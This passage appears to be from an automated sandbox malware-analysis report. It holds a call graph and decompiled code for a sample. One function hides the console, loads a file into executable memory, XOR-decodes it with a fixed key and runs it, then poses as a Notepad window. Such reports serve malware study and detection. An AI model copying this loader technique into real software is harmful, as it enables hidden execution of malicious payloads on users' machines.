calls __get_errno 31608->31620 31614 4267f4 31609->31614 31622 420e29 14 API calls __get_errno 31609->31622 31611 4267bf 31621 420e3c 14 API calls __get_errno 31611->31621 31614->31603 31615 4267ff 31623 420e3c 14 API calls __get_errno 31615->31623 31616 4267c7 31616->31603 31618 426807 31624 41f16a 44 API calls __get_errno 31618->31624 31620->31611 31621->31616 31622->31615 31623->31618 31624->31616 31625->31561 31626->31563 31628 40a6a6 ___unDNameEx 31627->31628 31629 40a6ad 31628->31629 31630 40a6ce 31628->31630 31642 41f0ed 44 API calls 2 library calls 31629->31642 31638 41f3a9 EnterCriticalSection 31630->31638 31633 40a6c6 31633->31489 31634 40a6d9 31639 40a7a9 31634->31639 31638->31634 31644 40a7db 31639->31644 31641 40a6e8 31643 40a710 LeaveCriticalSection __fread_nolock 31641->31643 31642->31633 31643->31633 31645 40a812 31644->31645 31646 40a7ea 31644->31646 31648 41f218 __fread_nolock 44 API calls 31645->31648 31661 41f0ed 44 API calls 2 library calls 31646->31661 31649 40a81b 31648->31649 31658 41f871 31649->31658 31652 40a8c5 31662 40ac90 49 API calls 4 library calls 31652->31662 31654 40a8dc 31657 40a805 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 31654->31657 31663 40aad1 48 API calls 2 library calls 31654->31663 31655 40a8d4 31655->31657 31657->31641 31664 41f4d9 31658->31664 31661->31657 31662->31655 31663->31657 31665 41f4e5 ___unDNameEx 31664->31665 31666 40a839 31665->31666 31667 41f5c3 31665->31667 31669 41f541 31665->31669 31666->31652 31666->31654 31666->31657 31677 41f0ed 44 API calls 2 library calls 31667->31677 31675 426531 EnterCriticalSection 31669->31675 31671 41f547 31672 41f56c 31671->31672 31673 41f65c __fread_nolock 46 API calls 31671->31673 31676 41f5bb LeaveCriticalSection __wsopen_s 31672->31676 31673->31672 31675->31671 31676->31666 31677->31666 31679 40b9e8 ___unDNameEx 31678->31679 31680 402538 #17 31679->31680 31681 40ba32 31679->31681 31682 40b9fb ___scrt_fastfail 31679->31682 31680->31326 31691 41f3a9 EnterCriticalSection 31681->31691 31705 420e3c 14 API calls __get_errno 31682->31705 31685 40ba3c 31692 40b7d9 31685->31692 31686 40ba15 31706 41f16a 44 API calls __get_errno 31686->31706 31691->31685 31695 40b7ea ___scrt_fastfail 31692->31695 31697 40b806 31692->31697 31693 40b7f6 31775 420e3c 14 API calls __get_errno 31693->31775 31695->31693 31695->31697 31698 40b848 __fread_nolock 31695->31698 31707 40ba71 LeaveCriticalSection __fread_nolock 31697->31707 31698->31697 31699 41f218 __fread_nolock 44 API calls 31698->31699 31701 40b96f ___scrt_fastfail 31698->31701 31708 4207ec 31698->31708 31777 434658 44 API calls 3 library calls 31698->31777 31699->31698 31778 420e3c 14 API calls __get_errno 31701->31778 31704 40b7fb 31776 41f16a 44 API calls __get_errno 31704->31776 31705->31686 31706->31680 31707->31680 31709 420816 31708->31709 31710 4207fe 31708->31710 31712 420b6c 31709->31712 31717 42085c 31709->31717 31788 420e29 14 API calls __get_errno 31710->31788 31807 420e29 14 API calls __get_errno 31712->31807 31713 420803 31789 420e3c 14 API calls __get_errno 31713->31789 31716 420b71 31808 420e3c 14 API calls __get_errno 31716->31808 31719 420867 31717->31719 31720 42080b 31717->31720 31724 420897 31717->31724 31790 420e29 14 API calls __get_errno 31719->31790 31720->31698 31721 420874 31809 41f16a 44 API calls __get_errno 31721->31809 31723 42086c 31791 420e3c 14 API calls __get_errno 31723->31791 31727 4208b0 31724->31727 31728 4208ca 31724->31728 31729 4208fb 31724->31729 31727->31728 31735 4208b5 31727->31735 31792 420e29 14 API calls __get_errno 31728->31792 31795 410766 15 API calls __get_errno 31729->31795 31733 4208cf 31793 420e3c 14 API calls __get_errno 31733->31793 31734 42090c 31796 41072c 14 API calls 2 library calls 31734->31796 31779 42d86f 31735->31779 31739 4208d6 31794 41f16a 44 API calls __get_errno 31739->31794 31740 420a48 31743 420abc 31740->31743 31744 420a61 GetConsoleMode 31740->31744 31741 420915 31797 41072c 14 API calls 2 library calls 31741->31797 31746 420ac0 ReadFile 31743->31746 31744->31743 31747 420a72 31744->31747 31749 420b34 GetLastError 31746->31749 31750 420ad8 31746->31750 31747->31746 31751 420a78 ReadConsoleW 31747->31751 31748 42091c 31752 420941 31748->31752 31753 420926 31748->31753 31754 420b41 31749->31754 31755 420a98 31749->31755 31750->31749 31756 420ab1 31750->31756 31751->31756 31757 420a92 GetLastError 31751->31757 31800 41f88f 46 API calls 2 library calls 31752->31800 31798 420e3c 14 API calls __get_errno 31753->31798 31805 420e3c 14 API calls __get_errno 31754->31805 31772 4208e1 __fread_nolock 31755->31772 31801 420de2 14 API calls 2 library calls 31755->31801 31767 420b14 31756->31767 31768 420afd 31756->31768 31756->31772 31757->31755 31762 42094f 31762->31735 31763 420b46 31806 420e29 14 API calls __get_errno 31763->31806 31765 42092b 31799 420e29 14 API calls __get_errno 31765->31799 31771 420b2d 31767->31771 31767->31772 31803 420506 49 API calls 3 library calls 31768->31803 31804 420316 47 API calls __fread_nolock 31771->31804 31802 41072c 14 API calls 2 library calls 31772->31802 31774 420936 31774->31772 31775->31704 31776->31697 31777->31698 31778->31704 31780 42d889 31779->31780 31781 42d87c 31779->31781 31783 42d895 31780->31783 31811 420e3c 14 API calls __get_errno 31780->31811 31810 420e3c 14 API calls __get_errno 31781->31810 31783->31740 31785 42d881 31785->31740 31786 42d8b6 31812 41f16a 44 API calls __get_errno 31786->31812 31788->31713 31789->31720 31790->31723 31791->31721 31792->31733 31793->31739 31794->31772 31795->31734 31796->31741 31797->31748 31798->31765 31799->31774 31800->31762 31801->31772 31802->31720 31803->31772 31804->31774 31805->31763 31806->31772 31807->31716 31808->31721 31809->31720 31810->31785 31811->31786 31812->31785 31813 421509 31818 421074 31813->31818 31816 421548 31819 421093 31818->31819 31820 4210a6 31819->31820 31824 4210bb 31819->31824 31838 420e3c 14 API calls __get_errno 31820->31838 31822 4210ab 31839 41f16a 44 API calls __get_errno 31822->31839 31833 4211db 31824->31833 31840 42db18 53 API calls __get_errno 31824->31840 31825 4210b6 31825->31816 31835 42e655 31825->31835 31827 42128c 31844 41f16a 44 API calls __get_errno 31827->31844 31830 42122b 31830->31833 31841 42db18 53 API calls __get_errno 31830->31841 31832 421249 31832->31833 31842 42db18 53 API calls __get_errno 31832->31842 31833->31825 31843 420e3c 14 API calls __get_errno 31833->31843 31845 42ddb8 31835->31845 31838->31822 31839->31825 31840->31830 31841->31832 31842->31833 31843->31827 31844->31825 31848 42ddc4 ___unDNameEx 31845->31848 31846 42ddcb 31865 420e3c 14 API calls __get_errno 31846->31865 31848->31846 31850 42ddf6 31848->31850 31849 42ddd0 31866 41f16a 44 API calls __get_errno 31849->31866 31856 42e5e7 31850->31856 31855 42ddda 31855->31816 31868 422f29 31856->31868 31861 42e61d 31863 42de1a 31861->31863 31923 41072c 14 API calls 2 library calls 31861->31923 31867 42de4d LeaveCriticalSection __wsopen_s 31863->31867 31865->31849 31866->31855 31867->31855 31924 422e92 31868->31924 31871 422f4d 31873 423c93 31871->31873 31936 423b1b 31873->31936 31876 42e6cb 31961 42e2da 31876->31961 31878 42e6e8 31879 42e716 31878->31879 31880 42e6fd 31878->31880 31984 426609 31879->31984 31998 420e29 14 API calls __get_errno 31880->31998 31883 42e702 31999 420e3c 14 API calls __get_errno 31883->31999 31885 42e724 32000 420e29 14 API calls __get_errno 31885->32000 31886 42e73b 31997 42e1ec CreateFileW 31886->31997 31890 42e729 32001 420e3c 14 API calls __get_errno 31890->32001 31892 42e7f1 GetFileType 31893 42e843 31892->31893 31894 42e7fc GetLastError 31892->31894 32006 426554 15 API calls 3 library calls 31893->32006 32004 420de2 14 API calls 2 library calls 31894->32004 31895 42e7c6 GetLastError 32003 420de2 14 API calls 2 library calls 31895->32003 31897 42e774 31897->31892 31897->31895 32002 42e1ec CreateFileW 31897->32002 31899 42e80a CloseHandle 31899->31883 31901 42e833 31899->31901 32005 420e3c 14 API calls __get_errno 31901->32005 31903 42e7b9 31903->31892 31903->31895 31905 42e864 31907 42e8b0 31905->31907 32007 42e4e7 84 API calls 4 library calls 31905->32007 31906 42e838 31906->31883 31911 42e8b7 31907->31911 32009 42df9e 84 API calls 4 library calls 31907->32009 31910 42e8e5 31910->31911 31913 42e8f3 31910->31913 32008 435d28 47 API calls 2 library calls 31911->32008 31914 42e70f 31913->31914 31915 42e96f CloseHandle 31913->31915 31914->31861 32010 42e1ec CreateFileW 31915->32010 31917 42e99a 31918 42e9d0 31917->31918 31919 42e9a4 GetLastError 31917->31919 31918->31914 32011 420de2 14 API calls 2 library calls 31919->32011 31921 42e9b0 32012 42671c 15 API calls 3 library calls 31921->32012 31923->31863 31925 422eb2 31924->31925 31931 422ea9 31924->31931 31925->31931 31933 41feae 44 API calls 3 library calls 31925->31933 31927 422ed2 31934 42c0a4 44 API calls __ismbbgraph 31927->31934 31929 422ee8 31935 42c102 53 API calls __ismbbgraph 31929->31935 31931->31871 31932 42a728 5 API calls __wsopen_s 31931->31932 31932->31871 31933->31927 31934->31929 31935->31931 31937 423b43 31936->31937 31938 423b29 31936->31938 31940 423b4a 31937->31940 31941 423b69 31937->31941 31954 4246d2 14 API calls ___vcrt_freefls@4 31938->31954 31953 423b33 31940->31953 31955 424728 15 API calls __wsopen_s 31940->31955 31956 42555f MultiByteToWideChar 31941->31956 31944 423b78 31945 423b7f GetLastError 31944->31945 31952 423ba5 31944->31952 31959 424728 15 API calls __wsopen_s 31944->31959 31957 420de2 14 API calls 2 library calls 31945->31957 31948 423b8b 31958 420e3c 14 API calls __get_errno 31948->31958 31950 423bbc 31950->31945 31950->31953 31952->31953 31960 42555f MultiByteToWideChar 31952->31960 31953->31861 31953->31876 31954->31953 31955->31953 31956->31944 31957->31948 31958->31953 31959->31952 31960->31950 31962 42e315 31961->31962 31963 42e2fb 31961->31963 32015 42e26a 44 API calls __get_errno 31962->32015 31963->31962 32013 420e3c 14 API calls __get_errno 31963->32013 31966 42e30a 32014 41f16a 44 API calls __get_errno 31966->32014 31968 42e34d 31969 42e37c 31968->31969 32016 420e3c 14 API calls __get_errno 31968->32016 31970 42e3cf 31969->31970 32018 40e093 44 API calls __get_errno 31969->32018 31970->31878 31973 42e3ca 31973->31970 31975 42e447 31973->31975 31974 42e371 32017 41f16a 44 API calls __get_errno 31974->32017 32019 41f197 11 API calls __CreateFrameInfo 31975->32019 31978 42e453 31979 42e489 31978->31979 32020 420e3c 14 API calls __get_errno 31978->32020 31979->31878 31981 42e479 32021 41f16a 44 API calls __get_errno 31981->32021 31983 42e484 31983->31878 31985 426615 ___unDNameEx 31984->31985 32022 4260b0 EnterCriticalSection 31985->32022 31987 42661c 31988 426641 31987->31988 31993 4266b0 EnterCriticalSection 31987->31993 31994 426663 31987->31994 31990 4263e3 __wsopen_s 15 API calls 31988->31990 31992 426646 31990->31992 31992->31994 32026 426531 EnterCriticalSection 31992->32026 31993->31994 31995 4266bd LeaveCriticalSection 31993->31995 32023 426713 31994->32023 31995->31987 31997->31897 31998->31883 31999->31914 32000->31890 32001->31883 32002->31903 32003->31883 32004->31899 32005->31906 32006->31905 32007->31907 32008->31914 32009->31910 32010->31917 32011->31921 32012->31918 32013->31966 32014->31962 32015->31968 32016->31974 32017->31969 32018->31973 32019->31978 32020->31981 32021->31983 32022->31987 32027 4260f8 LeaveCriticalSection 32023->32027 32025 426683 32025->31885 32025->31886 32026->31994 32027->32025 32028 421d9d 32029 421daa 32028->32029 32033 421dc2 32028->32033 32083 420e3c 14 API calls __get_errno 32029->32083 32031 421daf 32084 41f16a 44 API calls __get_errno 32031->32084 32034 421e21 32033->32034 32042 421dba 32033->32042 32048 42f6f4 32033->32048 32035 41f218 __fread_nolock 44 API calls 32034->32035 32037 421e3a 32035->32037 32053 4206d8 32037->32053 32040 41f218 __fread_nolock 44 API calls 32041 421e73 32040->32041 32041->32042 32043 41f218 __fread_nolock 44 API calls 32041->32043 32044 421e81 32043->32044 32044->32042 32045 41f218 __fread_nolock 44 API calls 32044->32045 32046 421e8f 32045->32046 32047 41f218 __fread_nolock 44 API calls 32046->32047 32047->32042 32049 4108cd __get_errno 14 API calls 32048->32049 32050 42f711 32049->32050 32085 41072c 14 API calls 2 library calls 32050->32085 32052 42f71b 32052->32034 32054 4206e4 ___unDNameEx 32053->32054 32055 4206ec 32054->32055 32058 420704 32054->32058 32087 420e29 14 API calls __get_errno 32055->32087 32057 4207c1 32094 420e29 14 API calls __get_errno 32057->32094 32058->32057 32061 42073a 32058->32061 32060 4206f1 32088 420e3c 14 API calls __get_errno 32060->32088 32064 420743 32061->32064 32065 420758 32061->32065 32062 4207c6 32095 420e3c 14 API calls __get_errno 32062->32095 32089 420e29 14 API calls __get_errno 32064->32089 32086 426531 EnterCriticalSection 32065->32086 32069 420750 32096 41f16a 44 API calls __get_errno 32069->32096 32070 420748 32090 420e3c 14 API calls __get_errno 32070->32090 32071 42075e 32073 42077a 32071->32073 32074 42078f 32071->32074 32091 420e3c 14 API calls __get_errno 32073->32091 32076 4207ec __fread_nolock 55 API calls 32074->32076 32078 42078a 32076->32078 32093 4207b9 LeaveCriticalSection __wsopen_s 32078->32093 32079 42077f 32092 420e29 14 API calls __get_errno 32079->32092 32082 4206f9 32082->32040 32082->32042 32083->32031 32084->32042 32085->32052 32086->32071 32087->32060 32088->32082 32089->32070 32090->32069 32091->32079 32092->32078 32093->32082 32094->32062 32095->32069 32096->32082

                                                      Executed Functions

                                                      Function 00403345 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 373 403345-403350 SetUnhandledExceptionFilter
                                                      C-Code - Quality: 100%
                                                      			E00403345() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00403351); // executed
				return _t1;
			}




                                                      0x0040334a
                                                      0x00403350

                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00003351,00402B17), ref: 0040334A
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 75e1f27f08a58f73f2b960698ae03c87e0f3631678d6c68d709b9a0021c32e73
                                                      • Instruction ID: 693c1ceddf53a2abd93a6b5a00366d95ac8d6255ecc5c87207acbc9a51383e2e
                                                      • Opcode Fuzzy Hash: 75e1f27f08a58f73f2b960698ae03c87e0f3631678d6c68d709b9a0021c32e73
                                                      • Instruction Fuzzy Hash:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004024CF Relevance: 47.4, APIs: 25, Strings: 2, Instructions: 174windowregistrymemoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 82%
                                                      			E004024CF(struct HWND__* __eax, void* __ecx, void* __edx, intOrPtr _a8) {
				struct _WNDCLASSEXW _v52;
				struct tagMONITORINFO _v100;
				struct tagMSG _v128;
				void* __edi;
				void* _t32;
				long _t34;
				void* _t36;
				char* _t41;
				int _t43;
				struct HMONITOR__* _t48;
				int _t56;
				int _t58;
				int _t60;
				intOrPtr _t65;
				void* _t69;
				long _t70;
				signed int _t75;
				int _t76;
				void* _t78;
				int _t79;
				void* _t81;
				void* _t83;
				struct HACCEL__* _t85;
				void* _t87;
				signed int _t94;

				_t78 = __edx;
				__imp__GetConsoleWindow(_t81, _t87, _t69); // executed
				ShowWindow(__eax, 0); // executed
				_t32 = E0040B316( *((intOrPtr*)(_a8 + 4)), "rb"); // executed
				_t88 = _t32;
				E0040B75E(_t78, 0, _t32, 0, 2); // executed
				_t34 = E0040B031(_t78, 0, _t32); // executed
				_t70 = _t34; // executed
				E0040B75E(_t78, 0, _t88, 0, 0); // executed
				_t36 = VirtualAlloc(0, _t70, 0x3000, 0x40); // executed
				_t83 = _t36;
				E0040B9BF(_t83, _t70, 1, _t88); // executed
				_t75 = 0;
				if(_t70 == 0) {
					L2:
					 *_t83(); // executed
					__imp__#17();
					RegisterWindowMessageW(L"commdlg_FindReplace");
					E00403D00(_t83, 0x44cf00, 0, 0x11f4);
					 *0x44cf00 = 0;
					_t41 =  &_v52;
					_t79 = 0x30;
					_t76 = _t79;
					do {
						 *_t41 = 0;
						_t41 = _t41 + 1;
						_t76 = _t76 - 1;
					} while (_t76 != 0);
					_v52.cbSize = _t79;
					_v52.lpfnWndProc = E004024CA;
					_v52.hInstance = 0;
					_v52.hIcon = LoadIconW(0, 0x300);
					_t43 = GetSystemMetrics(0x32);
					_v52.hIconSm = LoadImageW( *0x44cf00, 0x300, 1, GetSystemMetrics(0x31), _t43, 0x8000);
					_v52.hCursor = LoadCursorW(0, 0x7f00);
					_v52.hbrBackground = 6;
					_v52.lpszMenuName = 0x201;
					_v52.lpszClassName = L"Notepad";
					_t48 = RegisterClassExW( &_v52);
					if(_t48 != 0) {
						__imp__MonitorFromRect(0x44cec0, 1);
						_v100.cbSize = 0x28;
						GetMonitorInfoW(_t48,  &_v100);
						__eflags =  *0x44cf04; // 0x0
						if(__eflags != 0) {
							E00401353();
							ShowWindow( *0x44cf04, 0);
							UpdateWindow( *0x44cf04);
							DragAcceptFiles( *0x44cf04, 1);
							GetCommandLineW();
							_t85 = LoadAcceleratorsW(0, 0x203);
							while(1) {
								_t56 = GetMessageW( &_v128, 0, 0, 0);
								__eflags = _t56;
								if(_t56 == 0) {
									break;
								}
								_t58 = IsDialogMessageW( *0x44cf08,  &_v128);
								__eflags = _t58;
								if(_t58 == 0) {
									_t60 = TranslateAcceleratorW( *0x44cf04, _t85,  &_v128);
									__eflags = _t60;
									if(_t60 == 0) {
										TranslateMessage( &_v128);
										DispatchMessageW( &_v128);
									}
								}
							}
							_t65 = _v128.wParam;
							goto L14;
						}
						ExitProcess(1);
					} else {
						_t65 = 0;
						L14:
						return _t65;
					}
				} else {
					goto L1;
				}
				do {
					L1:
					asm("cdq");
					_t94 = 0xc;
					 *(_t83 + _t75) =  *(_t83 + _t75) ^  *("248058040134" + _t75 % _t94);
					_t75 = _t75 + 1;
				} while (_t75 < _t70);
				goto L2;
			}




























                                                      0x004024cf
                                                      0x004024de
                                                      0x004024e5
                                                      0x004024f6
                                                      0x004024fd
                                                      0x00402501
                                                      0x0040250a
                                                      0x00402513
                                                      0x00402515
                                                      0x00402526
                                                      0x0040252f
                                                      0x00402533
                                                      0x0040253b
                                                      0x0040253f
                                                      0x00402557
                                                      0x00402557
                                                      0x00402559
                                                      0x00402564
                                                      0x00402577
                                                      0x0040257f
                                                      0x00402585
                                                      0x0040258b
                                                      0x0040258c
                                                      0x0040258e
                                                      0x0040258e
                                                      0x00402590
                                                      0x00402591
                                                      0x00402591
                                                      0x0040259b
                                                      0x004025a1
                                                      0x004025a9
                                                      0x004025c0
                                                      0x004025c4
                                                      0x004025e3
                                                      0x004025f0
                                                      0x004025f9
                                                      0x00402601
                                                      0x00402609
                                                      0x00402611
                                                      0x0040261a
                                                      0x00402629
                                                      0x00402633
                                                      0x0040263d
                                                      0x00402643
                                                      0x00402649
                                                      0x00402652
                                                      0x0040265e
                                                      0x0040266a
                                                      0x00402677
                                                      0x0040267d
                                                      0x00402695
                                                      0x004026da
                                                      0x004026e2
                                                      0x004026e4
                                                      0x004026e6
                                                      0x00000000
                                                      0x00000000
                                                      0x004026a4
                                                      0x004026aa
                                                      0x004026ac
                                                      0x004026ba
                                                      0x004026c0
                                                      0x004026c2
                                                      0x004026c9
                                                      0x004026d4
                                                      0x004026d4
                                                      0x004026c2
                                                      0x004026ac
                                                      0x004026e8
                                                      0x00000000
                                                      0x004026e8
                                                      0x0040264c
                                                      0x0040261c
                                                      0x0040261c
                                                      0x004026ec
                                                      0x004026f2
                                                      0x004026f2
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00402541
                                                      0x00402541
                                                      0x00402545
                                                      0x00402546
                                                      0x0040254f
                                                      0x00402552
                                                      0x00402553
                                                      0x00000000

                                                      APIs
                                                      • GetConsoleWindow.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004024DE
                                                      • ShowWindow.USER32(00000000), ref: 004024E5
                                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00402526
                                                      • __fread_nolock.LIBCMT ref: 00402533
                                                      • #17.COMCTL32 ref: 00402557
                                                      • RegisterWindowMessageW.USER32(commdlg_FindReplace), ref: 00402564
                                                      • LoadIconW.USER32 ref: 004025AD
                                                      • GetSystemMetrics.USER32 ref: 004025C4
                                                      • GetSystemMetrics.USER32 ref: 004025C9
                                                      • LoadImageW.USER32 ref: 004025D7
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004025EA
                                                      • RegisterClassExW.USER32 ref: 00402611
                                                      • MonitorFromRect.USER32(0044CEC0,00000001), ref: 00402629
                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 0040263D
                                                      • ExitProcess.KERNEL32 ref: 0040264C
                                                        • Part of subcall function 00401353: SetWindowTextW.USER32(00447A00), ref: 00401368
                                                        • Part of subcall function 00401353: SendMessageW.USER32(000000CD,00000000,00000000), ref: 0040137D
                                                        • Part of subcall function 00401353: SetFocus.USER32(?,00402657,?,?,?,?,?,?,?), ref: 00401389
                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,?), ref: 0040265E
                                                      • UpdateWindow.USER32 ref: 0040266A
                                                      • DragAcceptFiles.SHELL32(00000001), ref: 00402677
                                                      • GetCommandLineW.KERNEL32(?,?,?,?,?,?,?), ref: 0040267D
                                                      • LoadAcceleratorsW.USER32 ref: 00402689
                                                      • IsDialogMessageW.USER32(?), ref: 004026A4
                                                      • TranslateAcceleratorW.USER32(00000000,?), ref: 004026BA
                                                      • TranslateMessage.USER32(?), ref: 004026C9
                                                      • DispatchMessageW.USER32 ref: 004026D4
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004026E2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: MessageWindow$Load$MetricsMonitorRegisterShowSystemTranslate$AcceleratorAcceleratorsAcceptAllocClassCommandConsoleCursorDialogDispatchDragExitFilesFocusFromIconImageInfoLineProcessRectSendTextUpdateVirtual__fread_nolock
                                                      • String ID: ($commdlg_FindReplace
                                                      • API String ID: 590276011-4049073185
                                                      • Opcode ID: 3ec7fc1df8c06d510192b67d14fd7e857c72f94fb28c3b3c5de5b177c0a7bf71
                                                      • Instruction ID: d76bf5b5b0b4f890fcbd778f44d24d7d84c7179325af6b92a7657723f8af365a
                                                      • Opcode Fuzzy Hash: 3ec7fc1df8c06d510192b67d14fd7e857c72f94fb28c3b3c5de5b177c0a7bf71
                                                      • Instruction Fuzzy Hash: 6151ACB9505300AFE3106FA29C8DE6B7FACFB86754F04443AFA45921E1D7B88815CB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0042E6CB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 39%
                                                      			E0042E6CB(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				intOrPtr _v40;
				signed int _v48;
				void _v52;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				signed int _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				void* _t239;
				signed char _t242;
				signed int _t243;
				intOrPtr _t247;
				void* _t248;
				void* _t255;
				void* _t265;
				void* _t266;
				signed int _t267;
				signed int _t270;
				signed int _t271;
				signed int _t274;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t282;
				void* _t284;
				void* _t288;

				_t239 = __edx;
				_t266 = E0042E2DA(_t188, __ecx, _t248, _t265,  &_v76, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v52, _t266, _t191 << 2);
				_t278 = _t276 + 0x1c;
				_t267 = _t266 | 0xffffffff;
				if(_v40 != _t267) {
					_t114 = E00426609(_t188, _t239, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t267;
					if(_t114 != _t267) {
						_v24 = _v24 & 0x00000000;
						_v28 = 0xc;
						_t279 = _t278 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v20 =  !(_a16 >> 7) & 1;
						_push( &_v28);
						_push(_a12);
						memcpy(_t279,  &_v52, 1 << 2);
						_t196 = 0;
						_t122 = E0042E1EC(); // executed
						_t255 = _t122;
						_t281 = _t279 + 0x2c;
						_v12 = _t255;
						__eflags = _t255 - 0xffffffff;
						if(_t255 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t255); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v52;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v52 | 0x00000040;
								}
								_v5 = _t124;
								E00426554(_t196,  *_t189, _t255);
								_t242 = _v5 | 0x00000001;
								_v16 = _t242;
								_v52 = _t242;
								 *( *((intOrPtr*)(0x44c9f8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t242;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x44c9f8 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L22:
									_v5 = 0;
									_push( &_v5);
									_push(_a16);
									_t282 = _t281 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t282,  &_v52, _t205 << 2);
									_t134 = E0042DF9E(_t189,  &_v52 + _t205 + _t205,  &_v52);
									_t243 =  *_t189;
									_t270 = _t134;
									_t284 = _t282 + 0x30;
									__eflags = _t270;
									if(_t270 == 0) {
										 *((char*)( *((intOrPtr*)(0x44c9f8 + (_t243 >> 6) * 4)) + 0x29 + (_t243 & 0x0000003f) * 0x38)) = _v5;
										 *( *((intOrPtr*)(0x44c9f8 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x44c9f8 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x44c9f8 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
										__eflags = _v16 & 0x00000048;
										if((_v16 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0x44c9f8 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t271 = _v48;
										__eflags = (_t271 & 0xc0000000) - 0xc0000000;
										if((_t271 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v48 = _t271 & 0x7fffffff;
											_t214 = 6;
											_push( &_v28);
											_push(_a12);
											memcpy(_t284 - 0x18,  &_v52, _t214 << 2);
											_t247 = E0042E1EC();
											__eflags = _t247 - 0xffffffff;
											if(_t247 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
